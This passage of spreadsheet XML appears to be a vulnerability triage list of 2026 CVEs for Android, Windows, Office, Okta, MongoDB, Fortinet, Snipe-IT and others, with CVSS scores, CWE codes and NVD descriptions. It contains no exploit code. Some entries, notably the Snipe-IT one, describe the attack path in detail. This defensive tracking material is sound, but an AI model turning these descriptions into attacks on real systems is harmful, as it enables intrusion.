t="inlineStr" /><c r="H815" s="5" t="n"><v>0.001</v></c><c r="I815" s="5" t="inlineStr" /><c r="J815" s="5" t="inlineStr" /><c r="K815" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L815" s="5" t="inlineStr" /><c r="M815" s="5" t="inlineStr" /><c r="N815" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O815" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P815" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q815" s="5" t="inlineStr" /><c r="R815" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S815" s="5" t="inlineStr"><is><t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T815" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t></is></c></row><row r="816"><c r="A816" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B816" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C816" s="5" t="inlineStr"><is><t>CVE-2026-28656</t></is></c><c r="D816" s="5" t="n"><v>7.3</v></c><c r="E816" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F816" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G816" s="5" t="inlineStr" /><c r="H816" s="5" t="n"><v>0.001</v></c><c r="I816" s="5" t="inlineStr" /><c r="J816" s="5" t="inlineStr" /><c r="K816" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L816" s="5" t="inlineStr" /><c r="M816" s="5" t="inlineStr" /><c r="N816" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O816" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P816" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q816" s="5" t="inlineStr" /><c r="R816" s="5" t="inlineStr"><is><t>CWE-1021</t></is></c><c r="S816" s="5" t="inlineStr"><is><t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T816" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t></is></c></row><row r="817"><c r="A817" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B817" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C817" s="5" t="inlineStr"><is><t>CVE-2026-45528</t></is></c><c r="D817" s="5" t="n"><v>7.3</v></c><c r="E817" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F817" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G817" s="5" t="inlineStr" /><c r="H817" s="5" t="n"><v>0.001</v></c><c r="I817" s="5" t="inlineStr" /><c r="J817" s="5" t="inlineStr" /><c r="K817" s="5" t="inlineStr" /><c r="L817" s="5" t="inlineStr" /><c r="M817" s="5" t="inlineStr" /><c r="N817" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O817" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P817" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q817" s="5" t="inlineStr" /><c r="R817" s="5" t="inlineStr"><is><t>CWE-926</t></is></c><c r="S817" s="5" t="inlineStr"><is><t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T817" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t></is></c></row><row r="818"><c r="A818" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B818" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C818" s="5" t="inlineStr"><is><t>CVE-2026-69477</t></is></c><c r="D818" s="5" t="n"><v>7.3</v></c><c r="E818" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F818" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G818" s="5" t="inlineStr" /><c r="H818" s="5" t="n"><v>0.004</v></c><c r="I818" s="5" t="inlineStr" /><c r="J818" s="5" t="inlineStr" /><c r="K818" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L818" s="5" t="inlineStr" /><c r="M818" s="5" t="inlineStr" /><c r="N818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O818" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P818" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q818" s="5" t="inlineStr" /><c r="R818" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S818" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t></is></c><c r="T818" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t></is></c></row><row r="819"><c r="A819" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B819" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C819" s="5" t="inlineStr"><is><t>CVE-2026-78627</t></is></c><c r="D819" s="5" t="n"><v>7.3</v></c><c r="E819" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F819" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G819" s="5" t="inlineStr" /><c r="H819" s="5" t="n"><v>0.001</v></c><c r="I819" s="5" t="inlineStr" /><c r="J819" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K819" s="5" t="inlineStr" /><c r="L819" s="5" t="inlineStr" /><c r="M819" s="5" t="inlineStr" /><c r="N819" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O819" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P819" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q819" s="5" t="inlineStr" /><c r="R819" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S819" s="5" t="inlineStr"><is><t>The Okta Hyperdrive Integration installer does not mask the OAuth client secret when passed as an MSI property. The credential is recorded in plaintext in the installer log, the Application Event Log, and the process command line, all of which are readable by an authenticated local user on the workstation.</t></is></c><c r="T819" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t></is></c></row><row r="820"><c r="A820" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B820" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C820" s="5" t="inlineStr"><is><t>CVE-2026-86806</t></is></c><c r="D820" s="5" t="n"><v>7.3</v></c><c r="E820" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G820" s="5" t="inlineStr" /><c r="H820" s="5" t="n"><v>0.005</v></c><c r="I820" s="5" t="inlineStr" /><c r="J820" s="5" t="inlineStr" /><c r="K820" s="5" t="inlineStr" /><c r="L820" s="5" t="inlineStr" /><c r="M820" s="5" t="inlineStr" /><c r="N820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O820" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P820" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q820" s="5" t="inlineStr" /><c r="R820" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S820" s="5" t="inlineStr"><is><t>A weakness has been identified in opengeos GeoLibre up to 2.3.0. Impacted is the function _is_within_roots. This manipulation causes server-side request forgery. The attack can be initiated remotely. Upgrading to version 2.4.0 is recommended to address this issue. Patch name: b745f62e29fa37364686525a21eee5e5c0f8a369. It is recommended to upgrade the affected component.</t></is></c><c r="T820" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t></is></c></row><row r="821"><c r="A821" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B821" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C821" s="5" t="inlineStr"><is><t>CVE-2026-76561</t></is></c><c r="D821" s="5" t="n"><v>7.2</v></c><c r="E821" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F821" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G821" s="5" t="inlineStr" /><c r="H821" s="5" t="n"><v>0.006</v></c><c r="I821" s="5" t="inlineStr" /><c r="J821" s="5" t="inlineStr" /><c r="K821" s="5" t="inlineStr" /><c r="L821" s="5" t="inlineStr" /><c r="M821" s="5" t="inlineStr" /><c r="N821" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q821" s="5" t="inlineStr" /><c r="R821" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S821" s="5" t="inlineStr"><is><t>A flaw was found in Dogtag PKI, as used by FreeIPA's certificate authority component. The certificate profile import functionality does not fully validate uploaded profile content beyond the profile ID. An authenticated user with CA Administrator privileges can exploit Dogtag's ExternalProcessConstraint mechanism to execute arbitrary commands with attacker-controlled environment variables, achieving code execution as the pkiuser account.</t></is></c><c r="T821" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t></is></c></row><row r="822"><c r="A822" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B822" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C822" s="5" t="inlineStr"><is><t>CVE-2026-81349</t></is></c><c r="D822" s="5" t="n"><v>7.2</v></c><c r="E822" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F822" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G822" s="5" t="inlineStr" /><c r="H822" s="5" t="n"><v>0.007</v></c><c r="I822" s="5" t="inlineStr" /><c r="J822" s="5" t="inlineStr" /><c r="K822" s="5" t="inlineStr" /><c r="L822" s="5" t="inlineStr" /><c r="M822" s="5" t="inlineStr" /><c r="N822" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O822" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P822" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q822" s="5" t="inlineStr" /><c r="R822" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S822" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T822" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t></is></c></row><row r="823"><c r="A823" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B823" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C823" s="5" t="inlineStr"><is><t>CVE-2026-81806</t></is></c><c r="D823" s="5" t="n"><v>7.2</v></c><c r="E823" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F823" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G823" s="5" t="inlineStr" /><c r="H823" s="5" t="n"><v>0.002</v></c><c r="I823" s="5" t="inlineStr" /><c r="J823" s="5" t="inlineStr" /><c r="K823" s="5" t="inlineStr" /><c r="L823" s="5" t="inlineStr" /><c r="M823" s="5" t="inlineStr" /><c r="N823" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q823" s="5" t="inlineStr" /><c r="R823" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S823" s="5" t="inlineStr"><is><t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.

This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t></is></c><c r="T823" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t></is></c></row><row r="824"><c r="A824" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B824" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C824" s="5" t="inlineStr"><is><t>CVE-2026-82061</t></is></c><c r="D824" s="5" t="n"><v>7.2</v></c><c r="E824" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F824" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G824" s="5" t="inlineStr" /><c r="H824" s="5" t="n"><v>0.003</v></c><c r="I824" s="5" t="inlineStr" /><c r="J824" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K824" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L824" s="5" t="inlineStr" /><c r="M824" s="5" t="inlineStr" /><c r="N824" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O824" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P824" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q824" s="5" t="inlineStr" /><c r="R824" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S824" s="5" t="inlineStr"><is><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is></c><c r="T824" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t></is></c></row><row r="825"><c r="A825" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B825" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C825" s="5" t="inlineStr"><is><t>CVE-2026-82071</t></is></c><c r="D825" s="5" t="n"><v>7.2</v></c><c r="E825" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F825" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G825" s="5" t="inlineStr" /><c r="H825" s="5" t="n"><v>0.003</v></c><c r="I825" s="5" t="inlineStr" /><c r="J825" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K825" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L825" s="5" t="inlineStr" /><c r="M825" s="5" t="inlineStr" /><c r="N825" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O825" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P825" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q825" s="5" t="inlineStr" /><c r="R825" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S825" s="5" t="inlineStr"><is><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is></c><c r="T825" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t></is></c></row><row r="826"><c r="A826" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B826" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C826" s="5" t="inlineStr"><is><t>CVE-2026-84387</t></is></c><c r="D826" s="5" t="n"><v>7.2</v></c><c r="E826" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F826" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G826" s="5" t="inlineStr" /><c r="H826" s="5" t="n"><v>0.008999999999999999</v></c><c r="I826" s="5" t="inlineStr" /><c r="J826" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K826" s="5" t="inlineStr" /><c r="L826" s="5" t="inlineStr" /><c r="M826" s="5" t="inlineStr" /><c r="N826" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q826" s="5" t="inlineStr" /><c r="R826" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S826" s="5" t="inlineStr"><is><t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T826" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t></is></c></row><row r="827"><c r="A827" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B827" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C827" s="5" t="inlineStr"><is><t>CVE-2026-86733</t></is></c><c r="D827" s="5" t="n"><v>7.2</v></c><c r="E827" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G827" s="5" t="inlineStr" /><c r="H827" s="5" t="n"><v>0.003</v></c><c r="I827" s="5" t="inlineStr" /><c r="J827" s="5" t="inlineStr" /><c r="K827" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L827" s="5" t="inlineStr" /><c r="M827" s="5" t="inlineStr" /><c r="N827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O827" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P827" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q827" s="5" t="inlineStr" /><c r="R827" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S827" s="5" t="inlineStr"><is><t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t></is></c><c r="T827" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t></is></c></row><row r="828"><c r="A828" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B828" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C828" s="5" t="inlineStr"><is><t>CVE-2026-11573</t></is></c><c r="D828" s="5" t="n"><v>7.1</v></c><c r="E828" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F828" s="5" t="inlineStr"><is><t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t></is></c><c r="G828" s="5" t="inlineStr" /><c r="H828" s="5" t="n"><v>0.004</v></c><c r="I828" s="5" t="inlineStr" /><c r="J828" s="5" t="inlineStr" /><c r="K828" s="5" t="inlineStr" /><c r="L828" s="5" t="inlineStr" /><c r="M828" s="5" t="inlineStr" /><c r="N828" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O828" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P828" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q828" s="5" t="inlineStr" /><c r="R828" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S828" s="5" t="inlineStr"><is><t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t></is></c><c r="T828" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t></is></c></row><row r="829"><c r="A829" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B829" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C829" s="5" t="inlineStr"><is><t>CVE-2026-16769</t></is></c><c r="D829" s="5" t="n"><v>7.1</v></c><c r="E829" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F829" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G829" s="5" t="inlineStr" /><c r="H829" s="5" t="n"><v>0.001</v></c><c r="I829" s="5" t="inlineStr" /><c r="J829" s="5" t="inlineStr" /><c r="K829" s="5" t="inlineStr" /><c r="L829" s="5" t="inlineStr" /><c r="M829" s="5" t="inlineStr" /><c r="N829" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q829" s="5" t="inlineStr" /><c r="R829" s="5" t="inlineStr"><is><t>CWE-440</t></is></c><c r="S829" s="5" t="inlineStr"><is><t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t></is></c><c r="T829" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t></is></c></row><row r="830"><c r="A830" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B830" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C830" s="5" t="inlineStr"><is><t>CVE-2026-20293</t></is></c><c r="D830" s="5" t="n"><v>7.1</v></c><c r="E830" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F830" s="5" t="inlineStr"><is><t>psirt@cisco.com</t></is></c><c r="G830" s="5" t="inlineStr" /><c r="H830" s="5" t="n"><v>0.001</v></c><c r="I830" s="5" t="inlineStr" /><c r="J830" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K830" s="5" t="inlineStr" /><c r="L830" s="5" t="inlineStr" /><c r="M830" s="5" t="inlineStr" /><c r="N830" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O830" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P830" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q830" s="5" t="inlineStr" /><c r="R830" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S830" s="5" t="inlineStr"><is><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is></c><c r="T830" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t></is></c></row><row r="831"><c r="A831" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B831" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C831" s="5" t="inlineStr"><is><t>CVE-2026-66305</t></is></c><c r="D831" s="5" t="n"><v>7.1</v></c><c r="E831" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F831" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G831" s="5" t="inlineStr" /><c r="H831" s="5" t="n"><v>0.003</v></c><c r="I831" s="5" t="inlineStr" /><c r="J831" s="5" t="inlineStr" /><c r="K831" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L831" s="5" t="inlineStr" /><c r="M831" s="5" t="inlineStr" /><c r="N831" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O831" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P831" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q831" s="5" t="inlineStr" /><c r="R831" s="5" t="inlineStr"><is><t>CWE-603</t></is></c><c r="S831" s="5" t="inlineStr"><is><t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T831" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t></is></c></row><row r="832"><c r="A832" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B832" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C832" s="5" t="inlineStr"><is><t>CVE-2026-68835</t></is></c><c r="D832" s="5" t="n"><v>7.1</v></c><c r="E832" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F832" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G832" s="5" t="inlineStr" /><c r="H832" s="5" t="n"><v>0.005</v></c><c r="I832" s="5" t="inlineStr" /><c r="J832" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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32" s="5" t="inlineStr" /><c r="M832" s="5" t="inlineStr" /><c r="N832" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O832" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P832" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q832" s="5" t="inlineStr" /><c r="R832" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S832" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T832" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t></is></c></row><row r="833"><c r="A833" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B833" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C833" s="5" t="inlineStr"><is><t>CVE-2026-68846</t></is></c><c r="D833" s="5" t="n"><v>7.1</v></c><c r="E833" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F833" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G833" s="5" t="inlineStr" /><c r="H833" s="5" t="n"><v>0.006</v></c><c r="I833" s="5" t="inlineStr" /><c r="J833" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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33" s="5" t="inlineStr" /><c r="M833" s="5" t="inlineStr" /><c r="N833" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O833" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P833" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q833" s="5" t="inlineStr" /><c r="R833" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S833" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T833" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t></is></c></row><row r="834"><c r="A834" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B834" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C834" s="5" t="inlineStr"><is><t>CVE-2026-68889</t></is></c><c r="D834" s="5" t="n"><v>7.1</v></c><c r="E834" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F834" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G834" s="5" t="inlineStr" /><c r="H834" s="5" t="n"><v>0.004</v></c><c r="I834" s="5" t="inlineStr" /><c r="J834" s="5" t="inlineStr" /><c r="K834" s="5" t="inlineStr" /><c r="L834" s="5" t="inlineStr" /><c r="M834" s="5" t="inlineStr" /><c r="N834" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O834" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P834" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q834" s="5" t="inlineStr" /><c r="R834" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S834" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T834" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t></is></c></row><row r="835"><c r="A835" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B835" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C835" s="5" t="inlineStr"><is><t>CVE-2026-68893</t></is></c><c r="D835" s="5" t="n"><v>7.1</v></c><c r="E835" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F835" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G835" s="5" t="inlineStr" /><c r="H835" s="5" t="n"><v>0.005</v></c><c r="I835" s="5" t="inlineStr" /><c r="J835" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K835" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L835" s="5" t="inlineStr" /><c r="M835" s="5" t="inlineStr" /><c r="N835" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O835" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P835" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q835" s="5" t="inlineStr" /><c r="R835" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S835" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T835" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t></is></c></row><row r="836"><c r="A836" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B836" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C836" s="5" t="inlineStr"><is><t>CVE-2026-69272</t></is></c><c r="D836" s="5" t="n"><v>7.1</v></c><c r="E836" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F836" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G836" s="5" t="inlineStr" /><c r="H836" s="5" t="n"><v>0.004</v></c><c r="I836" s="5" t="inlineStr" /><c r="J836" s="5" t="inlineStr" /><c r="K836" s="5" t="inlineStr" /><c r="L836" 